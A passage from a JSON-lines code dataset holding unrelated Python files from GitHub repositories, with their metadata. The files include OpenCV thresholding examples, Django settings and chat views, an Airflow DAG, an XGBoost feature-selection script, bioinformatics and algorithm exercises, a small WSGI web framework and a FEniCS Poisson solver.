390]])\npts2 = np.float32([[0,0], [rows, 0], [0, cols], [rows, cols]])\n\nM = cv.getPerspectiveTransform(pts1, pts2)\nzoom_img = cv.warpPerspective(rgb_img, M, (rows, cols))\n\nshow_images([rgb_img, zoom_img], titles=['Originial', 'Zoomed and Rectified'])\n\n# Thresholding\n## Some of the types for thresholds are\nret, thresh1 = cv.threshold(rgb_img, 127, 255, cv.THRESH_BINARY)\nret, thresh2 = cv.threshold(rgb_img, 127, 255, cv.THRESH_BINARY_INV)\nret, thresh3 = cv.threshold(rgb_img, 127, 255, cv.THRESH_TRUNC)\nret, thresh4 = cv.threshold(rgb_img, 127, 255, cv.THRESH_TOZERO)\nret, thresh5 = cv.threshold(rgb_img, 127, 255, cv.THRESH_TOZERO_INV)\n\nshow_images([rgb_img, thresh1, thresh2, thresh3, thresh4, thresh5],\n titles=['Original', 'BINARY', 'BINARY_INV', 'TRUNC',\n 'TOZERO', 'TOZERO_INV'],\n cols=1)\n\n## And prebuild adaptive thresholds are\n","repo_name":"alejandroge/PyDocs","sub_path":"opencv.py","file_name":"opencv.py","file_ext":"py","file_size_in_byte":3636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72354502010","text":"from typing import Any, Dict, List, Type, TypeVar, Union\n\nimport attr\n\nfrom ..types import UNSET, Unset\n\nT = TypeVar(\"T\", bound=\"Memberstatuses1JsonBody\")\n\n\n@attr.s(auto_attribs=True)\nclass Memberstatuses1JsonBody:\n \"\"\"\n Attributes:\n name (Union[Unset, str]): Default: 'Non-Member'.\n is_member (Union[Unset, bool]):\n \"\"\"\n\n name: Union[Unset, str] = \"Non-Member\"\n is_member: Union[Unset, bool] = False\n additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)\n\n def to_dict(self) -> Dict[str, Any]:\n name = self.name\n is_member = self.is_member\n\n field_dict: Dict[str, Any] = {}\n field_dict.update(self.additional_properties)\n field_dict.update({})\n if name is not UNSET:\n field_dict[\"name\"] = name\n if is_member is not UNSET:\n field_dict[\"isMember\"] = is_member\n\n return field_dict\n\n @classmethod\n def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:\n d = src_dict.copy()\n name = d.pop(\"name\", UNSET)\n\n is_member = d.pop(\"isMember\", UNSET)\n\n memberstatuses_1_json_body = cls(\n name=name,\n is_member=is_member,\n )\n\n memberstatuses_1_json_body.additional_properties = d\n return memberstatuses_1_json_body\n\n @property\n def additional_keys(self) -> List[str]:\n return list(self.additional_properties.keys())\n\n def __getitem__(self, key: str) -> Any:\n return self.additional_properties[key]\n\n def __setitem__(self, key: str, value: Any) -> None:\n self.additional_properties[key] = value\n\n def __delitem__(self, key: str) -> None:\n del self.additional_properties[key]\n\n def __contains__(self, key: str) -> bool:\n return key in self.additional_properties\n","repo_name":"alxmrs/ngpvan-api-client","sub_path":"ngpvan_api_client/models/memberstatuses_1_json_body.py","file_name":"memberstatuses_1_json_body.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3043758558","text":"\"\"\"\nLocal settings\n\n- Run in Debug mode\n- Use console backend for emails\n- Add Django Debug Toolbar\n- Add django-extensions as app\n\"\"\"\nfrom .common import * # noqa: F403\n\nTEMPLATES[0]['OPTIONS']['debug'] = True # noqa: F405\n\n# SECRET CONFIGURATION\n# ------------------------------------------------------------------------------\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key\n# Note: This key only used for development and testing.\nSECRET_KEY = env(\"DJANGO_SECRET_KEY\", default='CHANGEME!!!') # noqa: F405\n\n# Mail settings\n# ------------------------------------------------------------------------------\nEMAIL_HOST = 'localhost'\nEMAIL_PORT = 1025\nEMAIL_BACKEND = env('DJANGO_EMAIL_BACKEND', default='django.core.mail.backends.console.EmailBackend') # noqa: F405\n\n# CACHING\n# ------------------------------------------------------------------------------\nCACHES = {'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', 'LOCATION': ''}}\n\n# TESTING\n# ------------------------------------------------------------------------------\nTEST_RUNNER = 'django.test.runner.DiscoverRunner'\n\n# Your local stuff: Below this line define 3rd party library settings\nAWS_STORAGE_BUCKET_AI_NAME = env('DJANGO_AWS_STORAGE_BUCKET_AI_NAME', default=None) # noqa: F405\n\n# Disable Rate Limit\nWHITELIST_API_IP_ADDRESS = ['127.0.0.1']\n","repo_name":"KlubJagiellonski/pola-backend","sub_path":"pola/config/settings/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"77"} +{"seq_id":"19422598213","text":"import json\nfrom datetime import datetime\nfrom airflow.models import DAG\nfrom airflow.operators.python import PythonOperator\nfrom airflow.operators.trigger_dagrun import TriggerDagRunOperator\n\n# Read JSON file daily\ndef read_rules_daily(ti) -> None:\n updated_json={}\n with open('data/case2.1/rules.json', 'r') as openfile:\n json_rule = json.load(openfile)\n with open('data/case2.1/sequence.json', 'r') as openfile:\n json_sequence = json.load(openfile)\n updated_json={}\n #Code to write a new JSON file to merge these files into one \n #Logic to merge files and add rule status param\n for x in json_sequence.get(\"seq\"):\n json_rule.get(x)[\"ruleStatus\"]=\"Pending\"\n updated_json[x]=json_rule.get(x)\n with open('data/case2.1/rulesDaily.json', 'w') as f:\n json.dump(updated_json,f)\n\n \nwith DAG(\n dag_id='read_rulesDaily',\n schedule_interval=None,\n start_date=datetime(2022, 7, 26),\n catchup=False\n) as dag:\n\n # get rules\n task_read_rules = PythonOperator(\n task_id='read_rules',\n python_callable=read_rules_daily,\n provide_context=True\n )\n\n # Tridder 2nd DAG\n task_schedule_service = TriggerDagRunOperator(\n task_id=\"trigger_Dag2\",\n trigger_dag_id=\"execute_rulesDaily\"\n )\n\n \n\ntask_read_rules>>task_schedule_service","repo_name":"AyanF/Airflow-dags","sub_path":"all dags/read_rulesDaily.py","file_name":"read_rulesDaily.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2941578952","text":"import requests\nfrom twilio.rest import Client\n\nVIRTUAL_TWILIO_NUMBER = \"your virtual twilio number\"\nVERIFIED_NUMBER = \"your own phone number verified with Twilio\"\n\nSTOCK_NAME = \"TSLA\"\nCOMPANY_NAME = \"Tesla Inc\"\n\nSTOCK_ENDPOINT = \"https://www.alphavantage.co/query\"\nNEWS_ENDPOINT = \"https://newsapi.org/v2/everything\"\n","repo_name":"imr30/100DaysofCoding","sub_path":"Day33_Stock_News/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"793541213","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.decorators import login_required\n\nfrom .models import Message\n\n\n@login_required\ndef chat_list(request):\n cur_user_id = request.user.id\n query = '''\n SELECT u.id, username, count(m.sender_id) as cnt\n FROM auth_user u LEFT JOIN chat_message m ON\n u.id = m.sender_id AND m.is_red = False AND m.getter_id = %s\n GROUP BY u.id HAVING u.id <> %s\n '''\n chat_list = User.objects.raw(query, (str(cur_user_id), str(cur_user_id)))\n return render(request=request,\n template_name='chat/chat_list.html',\n context={'chats': chat_list})\n\n\n@login_required\ndef chat_page(request, pk):\n cur_user_id = request.user.id\n\n if request.method == 'GET':\n Message.objects.filter(sender_id=pk,\n getter_id=cur_user_id,\n is_red=False).update(is_red=True)\n\n if request.method == 'POST':\n print(request.POST)\n new_message = Message(sender_id=cur_user_id, getter_id=pk,\n text=request.POST['message'])\n new_message.send()\n\n query = query = '''\n SELECT id, sender_id, getter_id, sended_time, text\n FROM chat_message\n WHERE sender_id = %s AND getter_id = %s OR\n sender_id = %s AND getter_id = %s\n '''\n history = Message.objects.raw(query,\n (str(cur_user_id), pk, pk, str(cur_user_id)))\n\n return render(request=request,\n template_name='chat/chat_page.html',\n context={'history': history, 'cur_id': cur_user_id})\n\n\ndef register(request):\n if request.method == 'POST':\n form = UserCreationForm(request.POST)\n if form.is_valid():\n user = form.save()\n username = form.cleaned_data.get('username')\n return redirect('chat_list')\n else:\n return render(request=request,\n template_name=\"registration/registration.html\",\n context={\"form\": form})\n\n form = UserCreationForm\n return render(request=request,\n template_name=\"registration/registration.html\",\n context={\"form\": form})\n","repo_name":"gorban-lobs/simple_chat","sub_path":"chat_project/chat/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39167335465","text":"class QueueTwoStacks(object):\n\n def __init__(self):\n self.in_stack = []\n self.out_stack =[]\n\n\n def enqueue(self,data):\n self.in_stack.append(data)\n\n\n def dequeue(self):\n if len(self.out_stack)==0:\n\n #Move all the data from in_stack to out_stack and then do a pop\n\n while len(self.in_stack )>0:\n pop_value= self.in_stack.pop()\n self.out_stack.append(pop_value)\n\n if len(self.out_stack) == 0:\n raise IndexError(\"Can't dequeue from empty stack\")\n \n return self.out_stack.pop()\n\n\ns1= QueueTwoStacks()\ns1.enqueue(12)\ns1.enqueue(1)\ns1.enqueue(2)\nprint(s1.in_stack)\ns1.enqueue(3)\ns1.enqueue(46)\n\nprint(s1.in_stack)\nprint(s1.dequeue())\nprint(s1.in_stack)\n\nprint(s1.out_stack)\n","repo_name":"basanneh/python_DataStructures","sub_path":"queuetwostacks.py","file_name":"queuetwostacks.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23247573839","text":"from os.path import join, dirname\nfrom dotenv import load_dotenv\n\n\nload_dotenv(join(dirname(__file__), \"../../.env\"))\n\nfrom config import HerokuManualLiveConfig\nimport server\n\n\ndef create():\n print(\"dropping... [1]\")\n server.db.drop_all() # drop previous schemas\n print(\"creating... [2]\")\n server.db.create_all() # load new schemas\n print(\"adding labels... [4]\")\n add_labels()\n print(\"adding roles... \")\n add_roles()\n print(\"adding users... [5]\")\n\n print(\"commiting... [10]\")\n server.db.session.commit()\n\n\nif __name__ == \"__main__\":\n if input(\"type 'production'\") == \"production\":\n app = server.init_app(HerokuManualLiveConfig)\n with app.app_context():\n from development.manual_db_utils.generate_new_user_db_heroku import (\n add_admin_user,\n )\n from development.manual_db_utils.generate_sample_db import (\n add_labels,\n add_roles,\n )\n\n create()\n","repo_name":"miquelvir/centrifuga4","sub_path":"development/manual_db_utils/generate_empty_db_heroku.py","file_name":"generate_empty_db_heroku.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"5472798901","text":"# 주식가격(성공)\n# 정확성: 66.7\n# 효율성: 33.3\n# 합계: 100.0 / 100.0\nfrom collections import deque\n\n\ndef solution(prices):\n answer = []\n price_queue = deque(prices)\n\n while price_queue:\n price = price_queue.popleft()\n num = 0\n for p in price_queue:\n num += 1\n if price > p:\n break\n answer.append(num)\n\n return answer\n\n\ns = solution([1, 2, 3, 2, 3]) # [4, 3, 1, 1, 0]\nprint(s)\n","repo_name":"UJHa/Codeit-Study","sub_path":"프로그래머스/00_코딩테스트_고득점_Kit/02_스택,큐/4_주식가격/jinhwan.py","file_name":"jinhwan.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5239296259","text":"n1 = 0\nn2 = 1\n\ni = int(input(\"Insira um número para iniciar a Fibonacci: \"))\n\n\nprint('Sequência de Fibonacci:')\n\nprint('{} -> {}'.format(n1, n2), end = '')\n\ncont = 3\n\nwhile cont <= i:\n\n n3 = n1 + n2\n\n print('-> {}'.format(n3), end = '')\n\n n1 = n2\n\n n2 = n3\n\n cont += 1\n\nprint('\\nFIM')","repo_name":"Ruan-F-M/Projetos-Simples","sub_path":"Fibonacci/Fibonacci.py","file_name":"Fibonacci.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25967806686","text":"\"\"\"\n@description: 画二维码,\ndata format like\n0 0\n0 1\n0 2\n0 3\n0 4\n0 5\n0 6\n\"\"\"\n\nimport matplotlib.pyplot as plt\n\nf = open(\"flag.txt\", \"r\").readlines()\n\nx_li = []\ny_li = []\nfor i in range(len(f)):\n x_li.append(int(f[i].strip().split()[0]))\n y_li.append(int(f[i].strip().split()[1]))\n\nplt.scatter(x_li, y_li)\nplt.show()","repo_name":"wgf4242/text","sub_path":"docs/ctf/scripts/misc/Misc_picture_QRCode_by_pillow_画二维码01coordinate2_by_matplotlib_pyplot_scatter.py","file_name":"Misc_picture_QRCode_by_pillow_画二维码01coordinate2_by_matplotlib_pyplot_scatter.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"77"} +{"seq_id":"21036111323","text":"# coding: utf-8\nimport json\nfrom utils import CombineFeature, ReadExperimentLog, FilterFeature, IsDifferentDistribution, AddBlackFeature, ReadData\nfrom Model.InitModel import InitModel\nimport pdb\nimport xgboost as xgb\nimport numpy as np\n\ndef gen_config_Lightgbm():\n config = {'config_name': 1,\n 'note': '2018-07-17',\n\n 'feature_names': [],\n \"model\": {\n \"name\": \"Lightgbm\",\n \"model_params\": {\n 'objective': 'binary',\n 'boosting_type': 'gbdt',\n \"learning_rate\": 0.01,\n 'metrics': 'auc',\n 'scale_pos_weight': 1,\n 'num_leaves': 31,\n 'max_depth': 4,\n 'min_child_weight': 0,\n 'reg_lambda': 0.0,\n 'min_split_gain': 0,\n 'subsample_freq': 1,\n 'subsample': 1,\n 'colsample_bytree': 0.6,\n 'num_threads': 20,\n \"verbose\": 1,\n \"seed\": 2018,\n },\n \"train_params\": {\n \"num_boost_round\": 60000,\n \"early_stopping_rounds\": 1000,\n },\n },\n 'cv_params': {'shuffle': True,\n 'random_state': 100,\n 'n_splits': 5,\n },\n 'save_experiment_result': True,\n 'oof': True,\n \"ensemble_method\": 'mean',\n 'norm_feat_imp': True}\n return config\n\n\ndef gen_config_Xgboost():\n config = {'config_name': 1,\n 'note': '2018-07-18',\n 'feature_names': [],\n\n # [\"count_max_ftr51_in_month4\", \"count_max_ftr51_in_month9\", \"count_max_ftr51_in_month10\", \"count_max_ftr51_in_month11\"],\n\n \"model\": {\n \"name\": \"Xgboost\",\n \"model_params\": {\n 'objective': 'binary:logistic',\n # 'objective': 'rank:pairwise',\n 'learning_rate': 0.1,\n 'eval_metric': 'auc',\n 'scale_pos_weight': 1,\n # 'num_leaves': 31,\n 'max_depth': 4,\n 'gamma': 0,\n 'min_child_weight': 1,\n 'lambda': 1,\n 'alpha': 0,\n 'colsample_bytree': 0.7,\n 'subsample': 0.9,\n 'colsample_bylevel': 0.7,\n 'nthread': 20,\n 'silent': True,\n \"verbose\": 0,\n \"seed\": 2018,\n },\n \"train_params\": {\n \"num_boost_round\": 500,\n \"early_stopping_rounds\": 60,\n },\n },\n 'cv_params': {'shuffle': True,\n 'random_state': 100,\n 'n_splits': 5,\n },\n 'save_experiment_result': True,\n 'oof': True,\n \"ensemble_method\": 'mean',\n 'norm_feat_imp': True}\n return config\n\n\ndef gen_config_catboost():\n return\n\n\ndef gen_config_base(model_name):\n \"\"\"\n :param model_name:\n :return:\n \"\"\"\n if model_name == 'Xgboost':\n return gen_config_Xgboost()\n elif model_name == 'Lightgbm':\n return gen_config_Lightgbm()\n\n\ndef gen_config_feature(model_name, log_name_set, new_feature_hist_path, feature_batch_name_set, filter_black, add_new):\n \"\"\"\n 保留上一次实验的特征, 添加特征历史文件中的某批次特征, 选择模型基本参数, 过滤特征, 形成配置\n :param model_name: str\n :param log_name_set: int or str, 用于读取实验记录中的特征\n :param new_feature_hist_path: str, 新特征历史文件地址\n :param feature_batch_name_set: str, 如'20180102am'\n :param model_name: str, 模型名字,,如Lightgbm, Xgboost\n :return:\n \"\"\"\n # 1 读取基础配置\n base_config = gen_config_base(model_name)\n feature_names = base_config['feature_names']\n\n # 2 读取旧特征\n old_features = []\n for log_name in log_name_set:\n old_features += ReadExperimentLog(log_name)['config']['feature_names']\n\n # 3 根据批次, 添加新测试的特征\n new_features = []\n if add_new:\n for feature_batch_name in feature_batch_name_set:\n new_feature_dict = json.load(open(new_feature_hist_path))[feature_batch_name]\n for new_feature in new_feature_dict.keys():\n new_features.append(new_feature)\n\n feature_names = feature_names + old_features + new_features\n\n # 4 唯一和排序\n # feature_names = list(set(feature_names))\n # feature_names.sort()\n\n # 5 特征黑名单过滤\n if filter_black:\n feature_names = FilterFeature(feature_names)\n # 6 更新特征名并返回\n base_config['feature_names'] = feature_names\n\n # 7 不在黑名单的新特征, 有时会重复计算特征\n print('the size of feature name is ', len(feature_names))\n\n new_feature_list = [new_feature for new_feature in new_features if new_feature in feature_names]\n old_feature_list = [old_feature for old_feature in old_features if old_feature in feature_names]\n return base_config, new_feature_list, old_feature_list\n\n\ndef run(config):\n \"\"\"\n :param config: dict, 配置字典\n :return:\n \"\"\"\n # 1 根据配置合并特征\n Xtrain, Ytrain, Xtest = CombineFeature(config['feature_names'])\n\n # ------------------------\n train_id, test_id, train_data, test_data = ReadData(Ytrain=False, sort_by_time=True)\n Xtrain['PERSONID'] = train_id['PERSONID']\n Ytrain['PERSONID'] = train_id['PERSONID']\n Xtest['PERSONID'] = test_id['PERSONID']\n Xtrain.to_csv('Xtrain_xiao.csv', index=False)\n Ytrain.to_csv('Ytrain_xiao.csv', index=False)\n Xtest.to_csv('Xtest_xiao.csv', index=False)\n\n Xtrain.drop(['PERSONID'], axis=1, inplace=True)\n Ytrain.drop(['PERSONID'], axis=1, inplace=True)\n Xtest.drop(['PERSONID'], axis=1, inplace=True)\n # ------------------------\n\n # 2 根据配置初始化模型\n model = InitModel(Xtrain, Ytrain, Xtest, config)\n # 3 线下验证\n model.offline_validate()\n # 4 线上预测\n model.online_predict()\n # 保存实验结果\n if config['save_experiment_result']:\n model.save_experiment_result()\n # 6 返回线下验证分数以及显示预测结果\n\n # 保存模型\n for i, booster in enumerate(model.booster_offline_list):\n booster.save_model('xgb{}.m'.format(i))\n\n # 连接模型预测\n feature_names = list(Xtest.columns)\n xgb_test = xgb.DMatrix(Xtest[feature_names].values, feature_names=feature_names)\n\n submission_list = []\n for i, best_iter in enumerate([161, 292, 160, 246, 269]):\n load_model = xgb.Booster(model_file='xgb{}.m'.format(i))\n submission_list.append(load_model.predict(xgb_test, ntree_limit=best_iter))\n submission = np.mean(submission_list, axis=0)\n print(np.sum(np.abs(model.submission_online - submission)))\n\n return model.mean_score_offline, model.submission_online, model.fold_results\n\n\ndef select_feature(log_name, n, log_1):\n feature_names = []\n log = ReadExperimentLog(log_name)\n\n fold_results = log['result']['fold_results']\n for fold_result in fold_results:\n feats = [feat_tuple[0] for feat_tuple in sorted(fold_result['feature_importance_dict'].items(), key=lambda item: item[1])]\n feature_names += feats[-n:]\n\n feature_names = list(set(feature_names))\n print('The number of feature_names is ', len(feature_names))\n config = log['config']\n config['feature_names'] = feature_names\n config['config_name'] = log_1\n run(config)\n return feature_names\n\n\n\n\ndef main():\n # 用于特征测试以及特征选择\n # 0\n config_name = '57'\n config_note = 'gen_stats_value_ftr51'\n plot_new_feature = True\n plot_old_feature = True\n # 1 实验启动要素\n experiment_params = {\n 'model_name': 'Xgboost',\n 'log_name_set': [43],\n 'new_feature_hist_path': 'FeatureGenHistory/gen_stats_cost_diff_7d.json',\n 'feature_batch_name_set': ['20180730_am_{}'.format(i) for i in range(1,3)],\n 'filter_black': False,\n 'add_new':False}\n test_config, new_feature_list, old_feature_list = gen_config_feature(**experiment_params)\n # 3 配置名字\n test_config['config_name'] = config_name\n test_config['note'] = config_note\n # 4 运行该配置\n fold_results = run(test_config)[2]\n # pdb.set_trace()\n # 5 判断新测试的特征是否黑特征,添加到黑名单\n if plot_new_feature:\n for feature in new_feature_list:\n if feature in fold_results[0]['feature_importance_dict'].keys():\n try:\n print('feature importance is :', [fold_results[i]['feature_importance_dict'][feature] for i in range(5)])\n if IsDifferentDistribution(feature):\n AddBlackFeature([feature])\n except:\n print('error')\n # 6\n if plot_old_feature:\n for feature in old_feature_list:\n if feature in fold_results[0]['feature_importance_dict'].keys():\n try:\n print('feature importance is :', [fold_results[i]['feature_importance_dict'][feature] for i in range(5)])\n if IsDifferentDistribution(feature):\n AddBlackFeature([feature])\n except:\n print('error')\n\nmain()\n\n","repo_name":"datamininger/medicalinsurancefrauddetection","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"69953354490","text":"# https://rosalind.info/problems/corr/\n\n# https://github.com/cdeterman/Rosalind/blob/master/034_CORR/034_CORR.py\n\nfrom typing import List, Tuple\nfrom collections import Counter\n\nfrom data import load_fasta\nfrom utils import hamming_distance, reverse_complement\n\n\ndef load_data(filepath: str):\n return load_fasta(filepath)[1]\n\n\ndef seqs_expansion(seqs: str):\n expand_seqs = []\n for seq in seqs:\n expand_seqs.append(seq)\n expand_seqs.append(reverse_complement(seq))\n return expand_seqs\n\n\ndef correct_incorrect(counts, orig_seqs):\n correct = []\n incorrect = []\n for s in counts:\n if counts[s] >= 2:\n correct.append(s)\n elif s in orig_seqs:\n incorrect.append(s)\n return correct, incorrect\n\n\ndef error_correction(corrs: list, incorrs: list):\n correct_tuples = []\n for s1 in incorrs:\n for s2 in corrs:\n if hamming_distance(s1, s2) == 1:\n correct_tuples.append((s1, s2))\n return correct_tuples\n\n\ndef save_corrections(filepath: str, corrections: List[Tuple]):\n out = open(filepath, 'w')\n for s1, s2 in corrections:\n out.write(f\"{s1}->{s2}\\n\")\n out.close()\n print(f\"Save result to {filepath}.\")\n\n\nif __name__ == '__main__':\n path = \"datasets/034.corr.in\"\n outpath = \"./datasets/034.corr.out\"\n seqs = load_data(path)\n expand_seqs = seqs_expansion(seqs)\n counter = Counter(expand_seqs)\n corr_seqs, incorr_seqs = correct_incorrect(counter, seqs)\n corrections = error_correction(corr_seqs, incorr_seqs)\n save_corrections(outpath, corrections)\n","repo_name":"xwmp3/rosalind-python","sub_path":"bioinfomatics-stronghold/034.corr.py","file_name":"034.corr.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30916691207","text":"import os\nimport inspect\nfrom datetime import datetime, timedelta\n\nfrom werkzeug.routing import Map, Rule\nfrom werkzeug.wrappers import Request\nfrom werkzeug.exceptions import NotFound, HTTPException, MethodNotAllowed\nfrom parse import parse\nfrom requests import Session as RequestsSession\nfrom wsgiadapter import WSGIAdapter as RequestsWSGIAdapter\nfrom jinja2 import Environment, FileSystemLoader\nfrom whitenoise import WhiteNoise\n\nfrom sqlalchemy.ext.declarative import declarative_base\n\nfrom .middleware import Middleware\nfrom .response import Response\nfrom .database import Database\nfrom .session import ClientSession\n\n\nclass Spatz:\n \"\"\"The Spatz WSGI Application Class.\n Including Jinga Template Engine, Whitenoise Static files management, SQLAlchemy ORM...\n\n You can replace the template engine or static files directory if you know well Jinga2 Template and whitenoise.\n \"\"\"\n\n # the default configuration\n default_config = {\n \"ENV\": None,\n \"DEBUG\": None,\n \"SECRET_KEY\": None,\n \"SESSION_COOKIE_NAME\": \"session\",\n \"SESSION_COOKIE_DOMAIN\": None,\n \"SESSION_COOKIE_PATH\": None,\n \"SESSION_COOKIE_HTTPONLY\": True,\n \"SESSION_COOKIE_SECURE\": False,\n \"SESSION_COOKIE_SAMESITE\": None,\n \"PERMANENT_SESSION_LIFETIME\": timedelta(days=1),\n }\n\n def __init__(self, templates_dir=\"templates\", static_dir=\"static\"):\n\n self.routes = Map()\n self.handlers = {}\n\n self.templates_env = Environment(\n loader=FileSystemLoader(os.path.abspath(templates_dir))\n )\n self.exception_handler = {}\n self.whitenoise = WhiteNoise(\n self.wsgi_app, root=static_dir, prefix=\"static/\", max_age=31536000\n )\n self.middleware = Middleware(self)\n self.db = Database(self)\n self.config = self.default_config.copy()\n\n # session interface\n self.SessionInterface = ClientSession\n\n # cache interface\n self.CacheInterface = None\n\n def __call__(self, environ, start_response):\n return self.whitenoise(environ, start_response)\n\n def wsgi_app(self, environ, start_response):\n return self.middleware(environ, start_response)\n\n def add_route(self, rule, handler, endpoint=None, methods=[\"GET\"]):\n \"\"\"Add a URL Rule.\n\n :param url: the URL rule.\n :type url: str\n :param handler: the function handling a request\n :type handler: callable\n :param endpoint: the endpoint for registered URL rule, defaults to None\n :type endpoint: str, optional\n :param methods: allowed methods, defaults to [\"GET\"]\n :type methods: list, optional\n \"\"\"\n\n # check if the rule exists\n for r in self.routes.iter_rules():\n if rule == r.rule:\n raise AssertionError(\"Such URL already exists.\")\n\n if endpoint is None:\n endpoint = handler.__name__\n\n # class-based handler\n if inspect.isclass(handler):\n for method in [\"post\", \"put\", \"delete\"]:\n if hasattr(handler, method):\n methods.append(method)\n\n rule = Rule(rule, endpoint=endpoint, methods=methods)\n self.routes.add(rule)\n self.handlers[endpoint] = handler\n\n def route(self, rule, **kwargs):\n def wrapper(handler):\n self.add_route(rule, handler, **kwargs)\n return handler\n\n return wrapper\n\n def handle_request(self, request):\n \"\"\"Handle requests and dispatch the requests to view functions\n\n :param request: requests from clients\n :type request: webob.Request\n :return: responses from view functions\n :rtype: webob.Response\n \"\"\"\n response = Response()\n response.render = self.render\n\n urls = self.routes.bind_to_environ(request.environ)\n try:\n endpoints, kwargs = urls.match()\n handler = self.handlers[endpoints]\n\n # class-based handler\n if inspect.isclass(handler):\n handler = getattr(handler(), request.method.lower(), None)\n if not handler:\n raise MethodNotAllowed()\n\n handler(request, response, **kwargs)\n\n except HTTPException as e:\n return e\n\n return response\n\n def render(self, template_name, context=None):\n if context is None:\n context = {}\n return self.templates_env.get_template(template_name).render(**context)\n\n def default_response(self, response):\n response.status_code = 404\n response.text = \"Not Found.\"\n\n return response\n\n def test_session(self, base_url=\"http://testserver\"):\n session = RequestsSession()\n session.mount(prefix=base_url, adapter=RequestsWSGIAdapter(self))\n return session\n\n def add_middleware(self, middleware_cls):\n self.middleware.add(middleware_cls)\n","repo_name":"Max-Chou/spatz","sub_path":"spatz/spatz.py","file_name":"spatz.py","file_ext":"py","file_size_in_byte":4925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26090731674","text":"import fenics\nimport numpy as np\n\n\nclass NeumannPoissonSolver:\n # Usage:\n # https://github.com/NickAlger/nalger_helper_functions/tree/master/jupyter_notebooks/neumann_poisson_solver.ipynb\n def __init__(me, function_space_V):\n me.V = function_space_V\n me.dof_coords = me.V.tabulate_dof_coordinates()\n\n f = fenics.Function(me.V)\n\n u = fenics.TrialFunction(me.V)\n v = fenics.TestFunction(me.V)\n a = fenics.inner(fenics.grad(u), fenics.grad(v)) * fenics.dx\n rhs = f * v * fenics.dx\n\n A = fenics.assemble(a)\n me.b = fenics.assemble(rhs)\n\n const_fct = fenics.Function(me.V)\n const_fct.interpolate(fenics.Constant(1.0))\n const_vec = const_fct.vector()\n me.const_vec = const_vec / fenics.norm(const_vec)\n\n prec = fenics.PETScPreconditioner('hypre_amg')\n fenics.PETScOptions.set('pc_hypre_boomeramg_relax_type_coarse', 'jacobi')\n me._solver = fenics.PETScKrylovSolver('cg', prec)\n me._solver.set_operator(A)\n\n def solve(me, rhs_fenics_vector, atol=0.0, rtol=1e-7, maxiter=100, verbose=False):\n me._solver.parameters['absolute_tolerance'] = atol\n me._solver.parameters['relative_tolerance'] = rtol\n me._solver.parameters['maximum_iterations'] = maxiter\n me._solver.parameters['monitor_convergence'] = verbose\n\n b = rhs_fenics_vector.copy()\n b = b - b.inner(me.const_vec) * me.const_vec\n\n x = fenics.Function(me.V)\n me._solver.solve(x.vector(), b)\n return x\n\n def solve_point_source(me, point, point_type='ind', atol=0.0, rtol=1e-10, maxiter=100, verbose=False):\n me.b.zero()\n if point_type == 'coords':\n point_fenics = fenics.Point(point)\n elif point_type == 'ind':\n point_fenics = fenics.Point(me.dof_coords[point, :])\n elif point_type == 'fenics':\n point_fenics = point\n else:\n raise RuntimeError('invalid point_type')\n ps = fenics.PointSource(me.V, point_fenics, 1.0)\n ps.apply(me.b)\n\n return me.solve(me.b, atol=atol, rtol=rtol, maxiter=maxiter, verbose=verbose)\n","repo_name":"NickAlger/nalger_helper_functions","sub_path":"nalger_helper_functions/neumann_poisson_solver.py","file_name":"neumann_poisson_solver.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"13645804494","text":"# p76\ndef get_string_length() -> int:\n len = 0\n\n data = list(input('文字列を入力してください\\n>'))\n\n for data[len] in data:\n len +=1\n\n return len\n\nresult = get_string_length()\nprint('文字長 = %d' % result )\n\n# def other_method():\n# data = input('文字列を入力してください\\n>')\n# print('文字長 = %s' % len(data) )\n\n# other_method()","repo_name":"yuga-oinuma/algorithm","sub_path":"Python/get_string_length.py","file_name":"get_string_length.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30244425238","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n\n A script to extract simulated magnetic susceptibility data \n from a SINGLE_ANISO/POLY_ANISO output 